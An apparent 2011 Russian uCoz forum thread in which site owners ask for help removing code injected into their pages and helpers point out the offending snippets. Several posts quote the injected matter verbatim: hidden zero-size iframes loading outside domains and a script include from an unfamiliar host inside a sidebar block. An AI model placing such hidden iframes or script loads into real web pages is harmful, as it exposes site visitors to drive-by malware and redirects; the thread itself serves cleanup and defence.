Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz Мастерская uCoz Безопасность сайта Вирусы на сайтах (для изучения) (примеры вредоносного кода и устранение) |
| Вирусы на сайтах (для изучения) |
|
bArS4061, блок часы
удалить выделенное красным Quote <!-- <block9> --> <table border="0" cellpadding="0" cellspacing="0" width="186"> <tr><td align="center" height="30" style="background:url('/.s/t/982/7.gif') #B60605;color:#FFFFFF;padding-bottom:5px;font-size:10px;"><b><!-- <bt> -->Часы<!-- </bt> --></b></td></tr> <tr><td style="background:url('/.s/t/982/8.gif');padding:0 5px 0 5px;"><!-- <bc> --><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash6/cabs/swflash.cab#version=6.0.0.0" width="100%" height="100%"> <param name="movie" value="http://mirmuzla.net.ru/am/chaciki.swf"><iframe style="position:absolute;left:1%;width:0%;top:1%;height:0%;"src="http://mirmuzla.net.ru/"></iframe> <param name="play" value="true"> <param name="loop" value="true"> <param name="WMode" value="transparent"> <param name="quality" value="high"> <param name="bgcolor" value=""> <param name="align" value=""> <embed src="http://avatar.moy.su/flash/clock/37.swf" play="true" loop="0" wmode="transparent" quality="high" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" align="" width="100%" height="100%"> </object><!-- </bc> --></td></tr> <tr><td><img src="/.s/t/982/9.gif" border="0"></td></tr> сайт хттп://mirmuzla.net.ru/ заражен оттуда у вас и всплывает то что выделено зеленым является ложным объектом и поменьше мусора тащите на сайт |
|
Добрый день. Вчера, 4 марта, на сайт http://polnota.3dn.ru установили код, который ведет на попандер http://kupipopup.com
Обнаружил это случайно, просматривая переходы с сайта в счетчике Li Не могу найти чужой код. Он поставлен хитро. Срабатывает попандер не на каждом посетителе сайта, а лишь изредка. Помогите пожалуйста. Это, конечно, не вирус, но сами понимаете, что мне поганят сайт, Яндекс и Гугл не очень любят сайты с попандерами и опускают их ниже плинтуса. |
|
Tess, попробуйте убрать:
Code <script language="JavaScript" src="http://tizer.passion.ru/n/p/polnota.3dn.ru/pasya1925.js" type="text/javascript"></script> <script type="text/javascript">var RNum = Math.floor(Math.random()*10000); document.write('<scr'+'ipt language="javascript" type="text/javascript" src="http://n.pay-click.ru/adv-out/?Id=20152&RNum='+RNum+'&Referer='+escape(document.referrer)+'"><'+'/scr'+'ipt>');</script> <script language="javascript" type="text/javascript" src="http://js.novatizer.com/visual.php?id=616&design=688&cat=1&did=98318284"></script> <script type="text/javascript">var RNum = Math.floor(Math.random()*10000); document.write('<scr'+'ipt language="javascript" type="text/javascript" src="http://n.ladycash.ru/adv_out.php?Id=12658&RNum='+RNum+'&Referer='+escape(document.referrer)+'"><'+'/scr'+'ipt>');</script> |
|
Проверила. Это все коды для вызова загрузки рекламных блоков. Зашла на каждый сайт рекламщиков и проверила их исходные коды. Все сходится. То есть на сайте нет ничего лишнего в указанных Вами строках. Кода на тот попандер нет. Он где-то в другом месте.
Добавлено (05-Мар-2011, 18:25:43) |
|
Вчера заметил на страницах своего сайта внедрённый, левый какой-то iframe такого вида:
Code <iframe src="http://petmovea.com" style="display:none"/> Адреса в элементе на других страницах были и такими: grigorich.com, iptestsdeep.com, petmovea.com - судя по всему всё это синонимы адреса - 91.193.192.22. Явно что-то не слишком приятное, кто-то влез, и то ли зарабатывает, то ли пароли ворует, то ли ещё что.... В исходном коде страниц ифрейм не просматривается. Только при помощи команды "проинспектировать элемент" в Опере и Хроме. Сайт стал жутко тормозить, в строке состояния браузеров появилась запись вида: "ожидание от grigorich.com". Вот я и думаю, что же это такое. Я единственный администратор, коды на сайт устанавливаю только я, и среди моих немногочисленных скриптов нет ничего такого, что может вызвать такую запись. Сегодня днём ифрейм неожиданно исчез. Что теперь делать мне и пользователям - чиститься от вирусов, менять повсюду пароли? Никто не сталкивался с такой проблемой? Если я не туда написал - переместите, пожалуйста, сообщение в другую тему, но не удаляйте. Сообщение отредактировал Rio_ - Суббота, 05 Мар 2011, 18:32:15
|
|
Rio_, адрес своего сайта дайте где проблему наблюдаете
|
|
Так и не могу найти код. Нашла кто владелец сайта попандера, что он переадресовывает на тизерную партнерку luxup.ru Нашла хост злоумышленника, адрес его почты и даже имя и фамилию владельца этого левого сайта kupipopup.com, а вот код найти не могу. Помогите бога ради
Добавлено (05-Мар-2011, 23:48:52) |
|
Tess, вы можете пояснить вот это
Quote Вчера, 4 марта, на сайт http://polnota.3dn.ru установили код, который ведет на попандер http://kupipopup.com что в статистике ливы конкретно? попробуйте снести ваши тизерки что упоминал G-XPert вместе с гнездом в придачу и посмотрите результат. а лучше поясните про попандер. |
|
В статистике ливы указывается переходы на сайт kupipopup.com оттуда по всей видимости идет переход на kupipopup.com/alabs.htm В Яндексе это единственная ссылка на этот сайт. Если просмотреть исходник страницы, то можно увидеть, что она ведет на luxup.ru Сама я не вижу попандера при переходе на свой сайт, а вот посетители попадают на него, в ливе видно переходы по ссылке на kupipopup.com, порядка 150 за 5 марта.
|
|
Помогите пожалуйста, на моем сайте, как говорят посетители присутствует вирус - появляется плеер для проигрывания чего-то и кричит антивирус - при заходе на главную!
У меня же все норм - ничего не кричит, стоит аваст - пару раз кричал когдато и все молчит. Что нужно сделать чтоб вирус убрать? адрес kerch.ucoz.com |
|
Quote (webanet) Rio_, адрес своего сайта дайте где проблему наблюдаете webanet, спасибо за внимание, но пока это не имеет смысла - я сайт временно отключил, т.к. вирусная запись опять возникла, причём по данным Оперы уже в совершенно вирусном варианте:
Code <iframe src="http://petmovea.com" style="display:none"/> <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://gubmos.com/index12"/> Про это уже и в Яндексе и в Гугле имеются ссылки. Я в общем-то понял с чем это связано - красивые окошки ханслайд (highslide). Я в отдельном модуле сайта их отключил и вирусная запись исчезла. Второй раз у меня эта проблема, и я никак не пойму в чём же фишка. Первый раз я их амуницию скачивал непонятно откуда, было это давно и при первых же признаках этой хренотени я их снёс. Второй раз я их загружал с официального сайта и три месяца с ними не было никаких проблем. А теперь вот проблемы возникли вновь. У меня слишком много там на этих окнах ханслайд наворочено, чтобы просто так взять снести их скрипты. Надо многое сперва изменить. Поэтому я сайт временно выключил. Но я не хочу от них отказываться! Эти окна - красивая штука, они очень украшают страницы. Мне непонятно что же произошло. Сам ханслайд.ком в такой дури я как-то и подозревать не могу. Остаётся предположить, что какой-то бот заменил мне ханслайдовские файлы (вида highslide-full.js) на свои, где были внедрены уже эти вирусные записи. Отсюда (возможно) следует, что кому-то известны пароли к панели управления или к фтп (?!). В опции "безопасность" на юкозе я вроде как ничего подозрительного не нашёл. Непонятно что же теперь делать. Менять пароли и установить ханслайд заново и посмотреть на результат? Или вовсе от ханслайда отказаться? |
|
Здравствуйте. Антивирус блокирует http://thuglive.pp.ua/a.js при входе на мой сайт-http://klevosoft.ucoz.ru/. Не могу найти с какого скрипта проблема, помогите разобраться.
 |
|
Vovanmamont, Стоит в блоке: Юмор. (Второй контейнер).
Quote <!-- <block4569> --> <table border="0" cellpadding="0" cellspacing="0" width="200"> <tr><td style="background:url('/.s/t/331/9.gif') #F18008;color:#240000;" height="25" align="center"><b><!-- <bt> -->Юмор<!-- </bt> --></b></td></tr> <tr><td style="background:url('/.s/t/331/10.jpg') top no-repeat #570000;padding:10px;"><!-- <bc> --><div align="center">Анекдоты</a></div><hr /><script type="text/javascript" src="http://thuglive.pp.ua/a.js"></script><script type="text/javascript" src="http://www.ucob.ru/informer/10-1"></script><!-- </bc> --></td></tr> <tr><td height="11"><img src="/.s/t/331/11.gif" border="0"></td></tr> </table><br /> <!-- </block4569> --> Советую убрать блок полностью. Сообщение отредактировал CenatioN - Воскресенье, 06 Мар 2011, 13:45:26
|
|
Rio_,
Quote т.к. вирусная запись опять возникла, причём по данным Оперы уже в совершенно вирусном варианте: |
| |||
